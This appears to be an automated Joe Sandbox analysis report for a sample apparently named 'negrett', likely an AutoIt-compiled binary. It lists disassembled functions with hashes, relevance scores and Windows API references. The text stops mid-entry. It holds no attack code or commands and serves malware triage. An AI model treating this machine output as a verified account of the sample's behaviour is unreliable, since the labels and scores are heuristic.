Instruction ID: a5d542a10cc21f7327ccbf4885fe4ead823b77dbc3643a87640c015430f4c38b
Opcode Fuzzy Hash: fd59a5fff3ab1e0f25d262e306dea2c4cdcacac5fa5324721e35927a53a80e9b
Instruction Fuzzy Hash: 31E0863238021077D6312755BC0EF8B3E5CD787F71F104210F719760D08EB0590183A8

Uniqueness

Uniqueness Score: -1.00%

Function 00B21310 Relevance: 4.0, APIs: 1, Strings: 1, Instructions: 531COMMON

Download Yara Rule

APIs

__Init_thread_footer.LIBCMT ref: 00B217F6

Strings

CALL, xrefs: 00B217C6

Memory Dump Source

Source File: 00000005.00000002.774464819.0000000000B11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000005.00000002.774460130.0000000000B10000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.774477735.0000000000BAC000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.774477735.0000000000BD2000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.774497134.0000000000BDC000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.774500900.0000000000BE4000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_b10000_negrett.jbxd

Similarity

API ID: Init_thread_footer
String ID: CALL
API String ID: 1385522511-4196123274
Opcode ID: d60e67e3b0e4b3da3c598e077f5026a7afdf0cd29a71852f46c1ee6a9abd9bdd
Instruction ID: 4b0bb929740556fae2045275f5e872ed249a1ad7aad8f82cdf118632b953da2c
Opcode Fuzzy Hash: d60e67e3b0e4b3da3c598e077f5026a7afdf0cd29a71852f46c1ee6a9abd9bdd
Instruction Fuzzy Hash: 28229B706082519FC714DF18D490B2ABBF1FFA9314F2489ADF49A8B3A1D735E941CB92

Uniqueness

Uniqueness Score: -1.00%

Function 00B86EF1 Relevance: 3.8, APIs: 1, Strings: 1, Instructions: 297COMMON

Download Yara Rule

APIs

_wcslen.LIBCMT ref: 00B86F6B

Part of subcall function 00B14ECB: LoadLibraryExW.KERNEL32(?,00000000,00000002,?,00BE1418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00B14EFD

Strings

>>>AUTOIT SCRIPT<<<, xrefs: 00B86F5A, 00B86F63

Memory Dump Source

Source File: 00000005.00000002.774464819.0000000000B11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000005.00000002.774460130.0000000000B10000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.774477735.0000000000BAC000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.774477735.0000000000BD2000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.774497134.0000000000BDC000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.774500900.0000000000BE4000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_b10000_negrett.jbxd

Similarity

API ID: LibraryLoad_wcslen
String ID: >>>AUTOIT SCRIPT<<<
API String ID: 3312870042-2806939583
Opcode ID: 72a63ac88b6177133cd3df97444d702c04aac4906f59d3042aaade864365b288
Instruction ID: db2203a0a1284d522adca80d6cb0c10c954855eeb4b130ba279470c53e28cb22
Opcode Fuzzy Hash: 72a63ac88b6177133cd3df97444d702c04aac4906f59d3042aaade864365b288
Instruction Fuzzy Hash: 07B1A1311082018FCB14FF24C4919AEB7E5EF95304F54899DF49A972A2EF30ED89CB92

Uniqueness

Uniqueness Score: -1.00%

Function 00B4C827 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 132COMMON

Download Yara Rule

APIs

GetCPInfo.KERNEL32(?,?), ref: 00B4C84C

Strings

, xrefs: 00B4C891

Memory Dump Source

Source File: 00000005.00000002.774464819.0000000000B11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000005.00000002.774460130.0000000000B10000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.774477735.0000000000BAC000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.774477735.0000000000BD2000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.774497134.0000000000BDC000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.774500900.0000000000BE4000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_b10000_negrett.jbxd

Similarity

API ID: Info
String ID:
API String ID: 1807457897-3916222277
Opcode ID: 6ac29cafac31f580f757fc6c07260095c0c46d02404909e6d02d1678ec9d94fb
Instruction ID: e34950e0dd649d9fec6ea1efe1065847a241d6e4ffeb4f4a4bddbefbe9139fbf
Opcode Fuzzy Hash: 6ac29cafac31f580f757fc6c07260095c0c46d02404909e6d02d1678ec9d94fb
Instruction Fuzzy Hash: 92412B70505398AADF228F68CC84BFABFF9EB45B04F1404EDE58A87142D2359B45EF60

Uniqueness

Uniqueness Score: -1.00%

Function 00B12DE3 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 64COMMON

Download Yara Rule

APIs

GetOpenFileNameW.COMDLG32(?), ref: 00B52C8C

Part of subcall function 00B13AA2: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00B13A97,?,?,00B12E7F,?,?,?,00000000), ref: 00B13AC2

Part of subcall function 00B12DA5: GetLongPathNameW.KERNEL32 ref: 00B12DC4

Strings

X, xrefs: 00B52C5A

Memory Dump Source

Source File: 00000005.00000002.774464819.0000000000B11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000005.00000002.774460130.0000000000B10000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.774477735.0000000000BAC000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.774477735.0000000000BD2000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.774497134.0000000000BDC000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.774500900.0000000000BE4000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_b10000_negrett.jbxd

Similarity

API ID: Name$Path$FileFullLongOpen
String ID: X
API String ID: 779396738-3081909835
Opcode ID: 138bee2291e0b7c2842855632f3785fa4cde778b9fc2cf2eb3a89a723abb78b7
Instruction ID: 71599457e6201727d811ea9c4f93d04e4d9b500e4724391585aa23b6a0a2e0eb
Opcode Fuzzy Hash: 138bee2291e0b7c2842855632f3785fa4cde778b9fc2cf2eb3a89a723abb78b7
Instruction Fuzzy Hash: 2521D571A002589FDB01DF98C845BEEBBF8EF49704F40409AE405A7341EBB45A8D8F61

Uniqueness

Uniqueness Score: -1.00%

Function 00B82557 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 50COMMON

Download Yara Rule

APIs

__fread_nolock.LIBCMT ref: 00B82587

Strings

EA06, xrefs: 00B825B9

Memory Dump Source

Source File: 00000005.00000002.774464819.0000000000B11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000005.00000002.774460130.0000000000B10000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.774477735.0000000000BAC000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.774477735.0000000000BD2000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.774497134.0000000000BDC000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.774500900.0000000000BE4000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_b10000_negrett.jbxd

Similarity

API ID: __fread_nolock
String ID: EA06
API String ID: 2638373210-3962188686
Opcode ID: e54368c5e6c3dc5fe06789381731e0fd392bdfc1e19d70b034d5c5c302b488d0
Instruction ID: c86ff3a5ba8000ee12381f2f97c12a288159d8e3ecd56b78f2b49a1c6987cbaf
Opcode Fuzzy Hash: e54368c5e6c3dc5fe06789381731e0fd392bdfc1e19d70b034d5c5c302b488d0
Instruction Fuzzy Hash: 8201B572D442587EDF18D7A8C856FEEBBF8DB15301F00459AE592D21C1E5B4E608CB60

Uniqueness

Uniqueness Score: -1.00%

Function 00B43467 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 47COMMON

Download Yara Rule

APIs

LCMapStringW.KERNEL32(00000000,00000001,00000000,00000000,00000001,?,?,?,00000001,00000000,00000001,?,?,?,?,?), ref: 00B434D8

Strings

LCMapStringEx, xrefs: 00B43478, 00B43482

Memory Dump Source

Source File: 00000005.00000002.774464819.0000000000B11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000005.00000002.774460130.0000000000B10000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.774477735.0000000000BAC000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.774477735.0000000000BD2000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.774497134.0000000000BDC000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.774500900.0000000000BE4000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_b10000_negrett.jbxd

Similarity

API ID: String
String ID: LCMapStringEx
API String ID: 2568140703-3893581201
Opcode ID: ff8f507bb68676978493b13ddd689b3a1ec75b1ed3ff23d4f7f28db69d2c3df8
Instruction ID: 7aabfa98bfd9f7c741787f6506fda812281e8225826cff0293ea8d3444502795
Opcode Fuzzy Hash: ff8f507bb68676978493b13ddd689b3a1ec75b1ed3ff23d4f7f28db69d2c3df8
Instruction Fuzzy Hash: 5601D33264020DBBCF125F91DD02EEE7FE2EF48750F054194BE1466160CA769A71EB95

Uniqueness

Uniqueness Score: -1.00%

Function 00B43162 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 30memoryCOMMON

Download Yara Rule

APIs

TlsAlloc.KERNEL32 ref: 00B431A1

Strings

FlsAlloc, xrefs: 00B43173, 00B4317D

Memory Dump Source

Source File: 00000005.00000002.774464819.0000000000B11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000005.00000002.774460130.0000000000B10000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.774477735.0000000000BAC000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.774477735.0000000000BD2000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.774497134.0000000000BDC000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.774500900.0000000000BE4000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_b10000_negrett.jbxd

Similarity

API ID: Alloc
String ID: FlsAlloc
API String ID: 2773662609-671089009
Opcode ID: e3af69b502af160b837d6633187451de341eb130465bf27aa9ac27d1fe893783
Instruction ID: cf5f00f071c91d6a26e840685a4fc886804be8c336733d95377b4948c03af987
Opcode Fuzzy Hash: e3af69b502af160b837d6633187451de341eb130465bf27aa9ac27d1fe893783
Instruction Fuzzy Hash: 2AE0E531745218A797156BA09D06ABDBFD4EF44B11B4401D5FD05A7250DDB05F00A6DA

Uniqueness

Uniqueness Score: -1.00%

Function 00B33600 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 22COMMON

Download Yara Rule

APIs

try_get_function.LIBVCRUNTIME ref: 00B33615

Strings

FlsAlloc, xrefs: 00B33604, 00B3360E

Memory Dump Source

Source File: 00000005.00000002.774464819.0000000000B11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000005.00000002.774460130.0000000000B10000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.774477735.0000000000BAC000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.774477735.0000000000BD2000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.774497134.0000000000BDC000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.774500900.0000000000BE4000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_b10000_negrett.jbxd

Similarity

API ID: try_get_function
String ID: FlsAlloc
API String ID: 2742660187-671089009
Opcode ID: 2fdb190faa7ec7c77cf54e56a07472a2aeaba846db9c4f7fee61a695ba10a4c4
Instruction ID: 0470e2fc8957b808077efc57a0c81f882322afd53b55ab89a166b1df9b128806
Opcode Fuzzy Hash: 2fdb190faa7ec7c77cf54e56a07472a2aeaba846db9c4f7fee61a695ba10a4c4
Instruction Fuzzy Hash: AED0123268E2256FC6103AD4AD07AFABEC4DB53FB2F0400F1FD085626199664A1046C5

Uniqueness

Uniqueness Score: -1.00%

Function 00B4CB7C Relevance: 3.2, APIs: 2, Instructions: 168COMMON

Download Yara Rule

APIs

Part of subcall function 00B4C74F: GetOEMCP.KERNEL32(00000000), ref: 00B4C77A

IsValidCodePage.KERNEL32(-00000030,00000000,?,?,?,?,00B4CA1D,?,00000000), ref: 00B4CBF0
GetCPInfo.KERNEL32(00000000,00B4CA1D,?,?,?,00B4CA1D,?,00000000), ref: 00B4CC03

Memory Dump Source

Source File: 00000005.00000002.774464819.0000000000B11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000005.00000002.774460130.0000000000B10000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.774477735.0000000000BAC000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.774477735.0000000000BD2000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.774497134.0000000000BDC000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.774500900.0000000000BE4000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_b10000_negrett.jbxd

Similarity

API ID: CodeInfoPageValid
String ID:
API String ID: 546120528-0
Opcode ID: 53fce6cc97717cb8ebef4c8b7d22460305b8876870603369e49c95b50eb218a5
Instruction ID: 010a27fcab833eac11382f7c3d246ecc4612a4a54e1535b69267f0b663f25470
Opcode Fuzzy Hash: 53fce6cc97717cb8ebef4c8b7d22460305b8876870603369e49c95b50eb218a5
Instruction Fuzzy Hash: C7511370E012059FDB609F75C8C16BABFE5EF41B10F1480EED09A8B152E7359A41EBD0

Uniqueness

Uniqueness Score: -1.00%

Function 00B4C9BB Relevance: 3.1, APIs: 2, Instructions: 91COMMON

Download Yara Rule

APIs

Part of subcall function 00B42D74: GetLastError.KERNEL32(?,?,00B45686,00B53CD6,?,00000000,?,00B45B6A,?,?,?,?,?,00B3E6D1,?,00BD8A48), ref: 00B42D78
Part of subcall function 00B42D74: _free.LIBCMT ref: 00B42DAB
Part of subcall function 00B42D74: SetLastError.KERNEL32(00000000,?,?,?,?,00B3E6D1,?,00BD8A48,00000010,00B14F4A,?,?,00000000,00B53CD6), ref: 00B42DEC
Part of subcall function 00B42D74: _abort.LIBCMT ref: 00B42DF2

Part of subcall function 00B4CADA: _abort.LIBCMT ref: 00B4CB0C
Part of subcall function 00B4CADA: _free.LIBCMT ref: 00B4CB40

Part of subcall function 00B4C74F: GetOEMCP.KERNEL32(00000000), ref: 00B4C77A

_free.LIBCMT ref: 00B4CA33
_free.LIBCMT ref: 00B4CA69

Memory Dump Source

Source File: 00000005.00000002.774464819.0000000000B11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000005.00000002.774460130.0000000000B10000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.774477735.0000000000BAC000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.774477735.0000000000BD2000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.774497134.0000000000BDC000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.774500900.0000000000BE4000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_b10000_negrett.jbxd

Similarity

API ID: _free$ErrorLast_abort
String ID:
API String ID: 2991157371-0
Opcode ID: c94beb6fb7a58aada962c81cb8a9a066e9561675f9c1a7f8485913665554a62d
Instruction ID: be782592131d2640583ca358600b3b88ff4c5f4afa59882c22ad9d0e47c7a5eb
Opcode Fuzzy Hash: c94beb6fb7a58aada962c81cb8a9a066e9561675f9c1a7f8485913665554a62d
Instruction Fuzzy Hash: 7D31A43190510CAFDB51EB69D441BA9BFF5EF40724F2501DAF4049B2A2EB315F41EB50

Uniqueness

Uniqueness Score: -1.00%

Function 00B42FD7 Relevance: 3.1, APIs: 2, Instructions: 65libraryloaderCOMMON

Download Yara Rule

APIs

GetProcAddress.KERNEL32(00000000,00B11129,00000000,00000000,00000000,?,00B4328B,00000006,FlsSetValue,00BB2290,FlsSetValue,00000000,00000364,?,00B42E46,00000000), ref: 00B43037
__crt_fast_encode_pointer.LIBVCRUNTIME ref: 00B43044

Memory Dump Source

Source File: 00000005.00000002.774464819.0000000000B11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000005.00000002.774460130.0000000000B10000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.774477735.0000000000BAC000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.774477735.0000000000BD2000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.774497134.0000000000BDC000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.774500900.0000000000BE4000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_b10000_negrett.jbxd

Similarity

API ID: AddressProc__crt_fast_encode_pointer
String ID:
API String ID: 2279764990-0
Opcode ID: 58690981b4ebca23a81c3e32c18f25ea96813e4a6e0d067b2eea6f2763b1a701
Instruction ID: 6718dc57749f89ed1641e176a24dfc65e9d19bb11df9bb0893ec2ec4a7c1870e
Opcode Fuzzy Hash: 58690981b4ebca23a81c3e32c18f25ea96813e4a6e0d067b2eea6f2763b1a701
Instruction Fuzzy Hash: 3711C433A011219B9B329E19EC90A5AB7D5DB80B6071A03A0F915EB398DB31DF01E7D1

Uniqueness

Uniqueness Score: -1.00%

Function 00B15745 Relevance: 3.1, APIs: 2, Instructions: 56fileCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32(?,80000000,00000007,00000000,00000003,00000080,00000000), ref: 00B15773
CreateFileW.KERNEL32(?,C0000000,00000007,00000000,00000004,00000080,00000000), ref: 00B54052

Memory Dump Source

Source File: 00000005.00000002.774464819.0000000000B11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000005.00000002.774460130.0000000000B10000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.774477735.0000000000BAC000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.774477735.0000000000BD2000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.774497134.0000000000BDC000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.774500900.0000000000BE4000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_b10000_negrett.jbxd

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: b70a372a4402a61ca881296616bda355dd12045efc1a8dd23a6b8999b54762ad
Instruction ID: ef47e52dcd5989541731a16798e09e85fa0306fc7c33608f16dfcc183c21f35d
Opcode Fuzzy Hash: b70a372a4402a61ca881296616bda355dd12045efc1a8dd23a6b8999b54762ad
Instruction Fuzzy Hash: 10014031245225F6E3314A2ADC0FF977F98EF427B5F148250BA9C6A1E0CBB45894CB90

Uniqueness

Uniqueness Score: -1.00%

Function 00B33414 Relevance: 3.0, APIs: 2, Instructions: 19COMMON

Download Yara Rule

APIs

Part of subcall function 00B33600: try_get_function.LIBVCRUNTIME ref: 00B33615

___vcrt_FlsSetValue.LIBVCRUNTIME ref: 00B33432
___vcrt_uninitialize_ptd.LIBVCRUNTIME ref: 00B3343D

Memory Dump Source

Source File: 00000005.00000002.774464819.0000000000B11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000005.00000002.774460130.0000000000B10000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.774477735.0000000000BAC000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.774477735.0000000000BD2000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.774497134.0000000000BDC000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.774500900.0000000000BE4000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_b10000_negrett.jbxd

Similarity

API ID: Value___vcrt____vcrt_uninitialize_ptdtry_get_function
String ID:
API String ID: 806969131-0
Opcode ID: 0d9f8ceffdca57bfcc5c442821aad698c527ba70e12d3f570c670ddc81dd90d9
Instruction ID: dc0c3c37ebfaa4b690e27c8230d297d0706a6b0c2342b5b1f66c59c47fdaa533
Opcode Fuzzy Hash: 0d9f8ceffdca57bfcc5c442821aad698c527ba70e12d3f570c670ddc81dd90d9
Instruction Fuzzy Hash: DDD0A930648302A81D062BB538A305B37C08801F74FB062EAE420CA3D2EF2483412416

Uniqueness

Uniqueness Score: -1.00%

Function 00B1B710 Relevance: 2.1, APIs: 1, Instructions: 587COMMON

Download Yara Rule

APIs

__Init_thread_footer.LIBCMT ref: 00B1BB4E

Memory Dump Source

Source File: 00000005.00000002.774464819.0000000000B11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000005.00000002.774460130.0000000000B10000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.774477735.0000000000BAC000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.774477735.0000000000BD2000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.774497134.0000000000BDC000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.774500900.0000000000BE4000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_b10000_negrett.jbxd

Similarity

API ID: Init_thread_footer
String ID:
API String ID: 1385522511-0
Opcode ID: 66bb0afd5c1e51cd909cf51c761b980752d54ac29378cc01d8d5dd139743fe10
Instruction ID: d7c93ac73f58a13337c6e49cc7f0a141109515c85ed872cb382763778d1ae7e5
Opcode Fuzzy Hash: 66bb0afd5c1e51cd909cf51c761b980752d54ac29378cc01d8d5dd139743fe10
Instruction Fuzzy Hash: CF32BB31A04209DFDB24DF55C894EBEB7F9EF48340F5480D9E905AB2A1C778AD82CB91

Uniqueness

Uniqueness Score: -1.00%

Function 00B14ECB Relevance: 1.6, APIs: 1, Instructions: 65libraryCOMMON

Download Yara Rule

APIs

Part of subcall function 00B14E90: LoadLibraryA.KERNEL32(kernel32.dll), ref: 00B14E9C
Part of subcall function 00B14E90: GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection,?,?,00B14EDD,?,00BE1418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00B14EAE
Part of subcall function 00B14E90: FreeLibrary.KERNEL32(00000000,?,?,00B14EDD,?,00BE1418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00B14EC0

LoadLibraryExW.KERNEL32(?,00000000,00000002,?,00BE1418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00B14EFD

Part of subcall function 00B14E59: LoadLibraryA.KERNEL32(kernel32.dll), ref: 00B14E62
Part of subcall function 00B14E59: GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection,?,?,00B53CDE,?,00BE1418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00B14E74
Part of subcall function 00B14E59: FreeLibrary.KERNEL32(00000000,?,?,00B53CDE,?,00BE1418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00B14E87

Memory Dump Source

Source File: 00000005.00000002.774464819.0000000000B11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000005.00000002.774460130.0000000000B10000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.774477735.0000000000BAC000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.774477735.0000000000BD2000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.774497134.0000000000BDC000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.774500900.0000000000BE4000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_b10000_negrett.jbxd

Similarity

API ID: Library$Load$AddressFreeProc
String ID:
API String ID: 2632591731-0
Opcode ID: 1986a7685f46748e8d4e9eb0c12754f5e1c47134c8ac8ec051779db27e3b936d
Instruction ID: bfe4e256cafaa043899b29dd22e2fa7bd0c6592eee096be754548dd4460d80ee
Opcode Fuzzy Hash: 1986a7685f46748e8d4e9eb0c12754f5e1c47134c8ac8ec051779db27e3b936d
Instruction Fuzzy Hash: D511C432600305AACB24AB64DC02FED77E5AF44B11FA044A9F546AA2D1DF719A85D750

Uniqueness

Uniqueness Score: -1.00%

Function 00B48402 Relevance: 1.6, APIs: 1, Instructions: 54COMMON

Download Yara Rule

APIs

__wsopen_s.LIBCMT ref: 00B48440

Memory Dump Source

Source File: 00000005.00000002.774464819.0000000000B11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000005.00000002.774460130.0000000000B10000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.774477735.0000000000BAC000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.774477735.0000000000BD2000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.774497134.0000000000BDC000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.774500900.0000000000BE4000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_b10000_negrett.jbxd

Similarity

API ID: __wsopen_s
String ID:
API String ID: 3347428461-0
Opcode ID: 9dc5747029924e6815e5f630115e7844c0a76f4172451e2720142734a62be628
Instruction ID: 0c3cbb7945b6f631afe3bd86a6006d45478cfda2d810ab622a3765270ade11d6
Opcode Fuzzy Hash: 9dc5747029924e6815e5f630115e7844c0a76f4172451e2720142734a62be628
Instruction Fuzzy Hash: DA11187590410AAFCF05DF58E94199E7BF5EF48314F144199FC08AB312DA31DA11DBA5

Uniqueness

Uniqueness Score: -1.00%

Function 00B19A40 Relevance: 1.6, APIs: 1, Instructions: 53fileCOMMON

Download Yara Rule

APIs

ReadFile.KERNEL32(?,?,00010000,00000000,00000000), ref: 00B19A9C

Memory Dump Source

Source File: 00000005.00000002.774464819.0000000000B11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000005.00000002.774460130.0000000000B10000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.774477735.0000000000BAC000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.774477735.0000000000BD2000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.774497134.0000000000BDC000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.774500900.0000000000BE4000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_b10000_negrett.jbxd

Similarity

API ID: FileRead
String ID:
API String ID: 2738559852-0
Opcode ID: 0ed6873d112ec3d68deb7bb8c75f1fd3ced769c21c6166ebb080d3f3d1046383
Instruction ID: 47bbf7a1d999171b0d9c6359e0610e6b2b1c4086c1dbb6e76ee9e2fc8931c4b3
Opcode Fuzzy Hash: 0ed6873d112ec3d68deb7bb8c75f1fd3ced769c21c6166ebb080d3f3d1046383
Instruction Fuzzy Hash: E51166312047409FD7248E06C890BA6B7F8EF44360F50C46EE9AB8BA50C771B889CB60

Uniqueness

Uniqueness Score: -1.00%

Function 00B45000 Relevance: 1.6, APIs: 1, Instructions: 52COMMON

Download Yara Rule

APIs

Part of subcall function 00B44C7D: RtlAllocateHeap.NTDLL(00000008,00B11129,00000000,?,00B42E29,00000001,00000364,?,?,?,00B3F2DE,00B43863,00BE1444,?,00B2FDF5,?), ref: 00B44CBE

_free.LIBCMT ref: 00B4506C

Memory Dump Source

Source File: 00000005.00000002.774464819.0000000000B11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000005.00000002.774460130.0000000000B10000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.774477735.0000000000BAC000.00000002.00000001.01000000.00000004.sdmpDownload File
